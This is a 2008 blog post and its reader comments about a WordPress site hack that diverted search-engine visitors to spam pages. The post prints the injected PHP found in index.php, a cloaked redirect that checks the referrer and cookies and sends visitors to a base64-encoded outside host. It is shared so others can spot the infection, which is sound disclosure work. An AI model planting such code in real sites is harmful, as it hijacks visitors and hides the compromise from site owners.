Something scary happened today over at FiveCentNickel. Around 3:30 EDT today I noticed that traffic to the site was lagging way behind normal. Upon further investigation, I realized that my search traffic had all but dried up. Thinking I had been banned by Google, I dug deeper.
Oddly enough, I still ranked well for all of the terms that had brought me traffic in the past. So what was happening? If I was still ranking well in the SERPs, why weren’t people clicking through?
Unsure of what else to do, I enlisted the help of Jim, Flexo, and Clever Dude and sent a shout out to all who are following me on Twitter. Among other things, I asked these guys to search for a few keywords to see if my rankings were holding up.
My search results were just fine, ruling out the possibility that Google had rolled out new search data that excluded little old me, and it just hadn’t filtered down to our neck of the woods.
And then it happened…
Clever Dude clicked on a Google search result and was redirected elsewhere. But when he clicked it again, all was well. When I reported this via IM to Jim, he checked it out and saw something similar.
As it turns out, I was the victim of a WordPress hack that stole pretty much all of my search traffic, but somehow hid itself using cookies. Upon further inspection, I discovered the following bit of code at the top of index.php:
$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
If you hit Google without the cookie and tried to click through to my site, you were directed elsewhere. But once it happened to you once, it couldn’t be repeated until you cleared your cookies. Very sneaky.
So where was all of my traffic going?
It was being shunted through www.anyresult.net (no link for you!) and then winding up at an spammy, ad-filled landing page on www.dealtime.com (again, no link for you — I’ve helped enough today). I suspect that dealtime.com had likewise been compromised, though I can’t say for sure.
I’m still not sure how they got in, but I’ve reported it to my host, cleaned everything up, and changed all of my passwords. For reference, I was running WordPress 2.3.3, though I have since upgraded to WordPress 2.5.1.
Before you ask, yes, I’m aware that I was taking a slight risk by running a slightly older version of WordPress. In my defense, however, early releases of major WordPress updates often have numerous bugs of their own. As such, I typically wait until at X.X.2 before upgrading unless a serious hole is discovered in the version that I’m currently using.
Update: All WordPress versions appear to be vulnerable.
Guess what? I just found one.
June 5th, 2008 at 5:20 pm
That’s a drag. Thanks for sharing the details though. Certainly that would be difficult to diagnose, but having the string of code you posted to reference will make it easy to find for anyone else who has been hacked.
June 6th, 2008 at 9:01 am
I am sorry to hear about the incident. I am glad to see you recovered quickly.
June 7th, 2008 at 12:15 pm
Hello,
My blogs are suffering from the same hack.
How exactly did you clean it up?
Just remove the code from index/php?
June 8th, 2008 at 7:49 am
For what it’s worth I was running 2.5.1 and also go hacked.
The only difference seems to be the code going to wp-blog-header.php instead of index.php